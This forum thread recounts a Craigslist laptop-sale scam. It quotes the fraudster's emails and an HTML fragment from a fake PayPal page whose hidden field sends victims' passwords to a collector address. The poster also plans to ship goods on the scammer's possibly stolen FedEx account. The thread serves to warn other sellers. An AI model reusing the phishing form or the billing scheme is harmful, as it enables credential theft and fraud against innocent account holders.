So I'm selling a laptop on Craig's List Los Angeles. And a guy responded to my ad:
--------------
Hello,
Compliment of the season to you.I'm franklyn ken from PENNSYLVANIA, but Presently i'm leading a conventional church program in London. I saw your item (99770637) and i'll like to buy it for my son that will be starting a Computer science course in University of Nigeria Next week. Do not worry about the shipping of the item, i have an account with FEDEX and i'll be sending you my FEDEX account number for the shipping . Moreover i would have prefer to send you a cheque but simply because i want you to ship the item first thing tomorrow morning, i will be sending you payment via PAYPAL,so make sure you get the package ready for tomorrow shipment ok? And kindly send me your paypal address or your contact,so i can make the payment right away. Thanks franklyn ken
--------------
Hmmm In London? University of Nigeria? Has his own FedEx account number? He's from Pennsylvania and Capitalizes it and he spells check with a qu? Sounds like fraud to me, but I'm a trusting guy, I'll give the guy the benefit of the doubt, so I write back:
--------------
Hello Mr. Ken-
Thank you for your interest. Please send PayPal payment to "idrivex@mac.com". That is my paypal address. Also please send me your FedEx account number so that I can send you the laptop. Things to note:
- If you pay via PayPal with a Credit Card, it will be an instant transfer of funds and I can release the laptop to you in the morning.
- If you pay via PayPal out of your bank account, PayPal will delay my receipt of the funds until the bank account has been debited and PayPal has received the funds. If you decide to pay via this option, I will have to hold onto the laptop until the funds have shown "cleared" in my PayPal account.
Please send me an eMail back when you have made PayPal payment. Thank you.
---------------
I sent that letter thinking that if he was going to attempt bank fraud with PayPal that at least I'd know about it before he got the computer. Boy was I wrong. I definitely underestimated the frauder. I got this e-mail back.
----------------
See this link for screenshot of eMail
----------------
Now, for the unsuspecting internet denizen, this could have spelled trouble. Besides the glaring spelling mistakes and a feature that paypal doesn't even offer, I smelled rat all over it. Then he sends me this eMail about two second after I got the PayPal one.
-----------------
Hello,
I have made out my payment to you for this item purchase (99770637),So check your mail for the comfirmation mail from paypal.Get back to me immediately if you receive the confirmation mail from paypal and don't forget to send me your physical contact address and the exact time you will be at home tomorrow.So i can schedule Fedex to come and pick them up from you in other to reduce the stress of you driving down to their location to send it.Then i can send you my son's address and fedex account number.Hope to hear from you soon. Sincerely. Thanks
----------------
Ahhh Sincerely thanks to you Mr. Ken! So I told him that fed ex picks up packages every day from my work and it wouldn't be a problem and to send along the fedex account number so I can send him his laptop. I also thanked him for making the whole process so painless and smooth.
Then I took a picture of my middle finger, imported it into photoshop and wrote "Nice Try A**hole" and slipped it into a FedEx envelope. And then I may or may not have wiped myself with the corners of the piece of paper before I put it in the envelope. Smell ya later Mr. Ken.

The links send you to PayPal's actual website. The one that tells you to view the transaction online sends you to a very authentic looking PayPal page. Everything is correct except this little bit o code...
Code:
<tr>
<td align="right" class="label">
<input type="hidden" id="" name="login_email" value="zllgl05@aol.com"><label for="login_password">Password:</label>
</td>
<td><br></td>
<td>
<input type="password" id="login_password" name="login_password" value="" size="20" maxlength="40"> <span class="small"><a href="#" onClick="javascript:openWindowATC('https://www.paypal.com/us/cgi-bin/webscr?cmd=_forgot-password','','640','700','', windowNamer('https://www.paypal.com/us/cgi-bin/webscr?cmd=_forgot-password'));return false;">Forgot your password?</a></span><script language="JavaScript">document.login_form.login_password.focus();</script>
</td>
</tr>
If you are familiar with reading HTML forms, no matter what you put in there, it will automatically redirect you upon clicking to the PayPal "Lost Your Password" site, but it will also eMail your password to zllgl05@aol.com, who has also been signed up for a lot of spam sites as well!
Scary stuff out there man....scary stuff.
Yeah I reported the A-hole to PayPal, but they have their heads so far up their butts that no one will even care. I like instant Karma better.

Oh Mr. Ken, I plan on reply you soon as I send out your $10,000 declared laptop. And a few other packages to friends back east. Anyone need anything to be picked up at the Apple store and shipped to them? Australians? I know we've got some Australian's on this board. Who wants free shipping! We'll order from Small Dog so it's tax free and then ship it courtesy of Mr. Ken and his daughter Okolo. I wonder if Lagos is hot this time of year?

Um...
Ever stop to think that the FedEx account number might be stolen, too?
I'd try to see if it doesn't belong to someone else before running up a huge bill for him...

What's the tracking number? What's the expected delivery date?
Make sure you document all this.

I almost wanna get a scam email to see if I can get some free money.
I think there's a website that keeps track of how much money they scam from the Nigeria scammers, then they donate the money to a charity.
